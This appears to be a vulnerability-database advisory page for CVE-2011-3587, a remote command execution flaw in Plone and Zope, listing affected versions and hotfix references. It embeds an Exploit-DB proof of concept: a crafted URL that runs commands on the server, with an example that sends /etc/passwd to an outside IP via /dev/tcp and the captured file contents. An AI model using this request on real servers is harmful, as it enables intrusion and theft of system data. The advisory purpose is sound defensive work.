CVE-2011-3587
critical
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
10.0
Description
Zope Command Execution Vulnerability
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Plone and Zope - Remote Command Execution
# Exploit Title: Plone - Remote Command Execution
# Date: 12/21/2011
# Author: Nick Miles (www.npenetrable.com)
# Tested on: 12/21/2011
# CVE : CVE-2011-3587
Versions Affected (without hotfix): Plone 4.0 (through 4.0.9); Plone
4.1; Plone 4.2 (a1 and a2); Zope 2.12.x and Zope 2.13.x.
Versions Not Affected: Versions of Plone that use Zope other than Zope
2.12.x and Zope 2.13.x.
Advisory/Hotfix: http://plone.org/products/plone/security/advisories/20110928
You can execute any command on the remote Plone server with the
following request
if the server is Unix/Linux based (Note: you won't get returned the
results of the command):
http://PLONE_SITE/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=<command
to run>
Example:
Listen for a connection:
$ nc -l 4040
On victim, visit:
http://victim/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=cat%20/etc/passwd%20%20%3E%20/dev/tcp/172.20.6.218/4040
Response:
$ nc -l 4040
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:499:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
plone:x:500:500::/home/plone:/bin/falseMetasploit modules
Source fetch failed: fetch_error โ view the original via the link above.
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| plone | plone | 4.0 | |
| plone | plone | 4.0.1 | |
| plone | plone | 4.0.2 | |
| plone | plone | 4.0.3 | |
| plone | plone | 4.0.4 | |
| plone | plone | 4.0.5 | |
| plone | plone | 4.0.6.1 | |
| plone | plone | 4.0.7 | |
| plone | plone | 4.0.8 | |
| plone | plone | 4.0.9 | |
| plone | plone | 4.1 | |
| plone | plone | 4.2 | |
| plone | plone | 4.2a1 | |
| plone | plone | 4.2a2 | |
| zope | zope | 2.12.0 | |
| zope | zope | 2.12.1 | |
| zope | zope | 2.12.2 | |
| zope | zope | 2.12.3 | |
| zope | zope | 2.12.4 | |
| zope | zope | 2.12.5 | |
| zope | zope | 2.12.6 | |
| zope | zope | 2.12.7 | |
| zope | zope | 2.12.8 | |
| zope | zope | 2.12.9 | |
| zope | zope | 2.12.10 | |
| zope | zope | 2.12.11 | |
| zope | zope | 2.12.12 | |
| zope | zope | 2.12.13 | |
| zope | zope | 2.12.14 | |
| zope | zope | 2.12.15 | |
| zope | zope | 2.12.16 | |
| zope | zope | 2.12.17 | |
| zope | zope | 2.12.18 | |
| zope | zope | 2.12.19 | |
| zope | zope | 2.12.20 | |
| zope | zope | 2.13.0 | |
| zope | zope | 2.13.1 | |
| zope | zope | 2.13.2 | |
| zope | zope | 2.13.3 | |
| zope | zope | 2.13.4 | |
| zope | zope | 2.13.5 | |
| zope | zope | 2.13.6 | |
| zope | zope | 2.13.7 | |
| zope | zope | 2.13.8 | |
| zope | zope | 2.13.9 | |
| zope | zope | 2.13.10 | |
References
- http://plone.org/products/plone-hotfix/releases/20110928
- http://plone.org/products/plone-hotfix/releases/20110928/PloneHotfix20110928-1.0.zip
- http://plone.org/products/plone/security/advisories/20110928
- http://pypi.python.org/pypi/Products.PloneHotfix20110928/1.0
- http://secunia.com/advisories/46221
- http://secunia.com/advisories/46323
- http://zope2.zope.org/news/security-vulnerability-announcement-cve-2011-3587
- https://bugzilla.redhat.com/show_bug.cgi?id=742297
- https://nvd.nist.gov/vuln/detail/CVE-2011-3587
- https://github.com/zopefoundation/Zope/commit/491a583d8c6622b80c75917e5017c4bb4b15e477
- https://github.com/zopefoundation/Zope/commit/6bb2fb3c04a76b00bec9bd7c069733e06fa6ebe9
- https://github.com/pypa/advisory-database/tree/main/vulns/products-plonehotfix20110928/PYSEC-2011-26.yaml
- https://github.com/zopefoundation/Zope
- https://web.archive.org/web/20111013043934/http://zope2.zope.org/news/security-vulnerability-announcement-cve-2011-3587
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.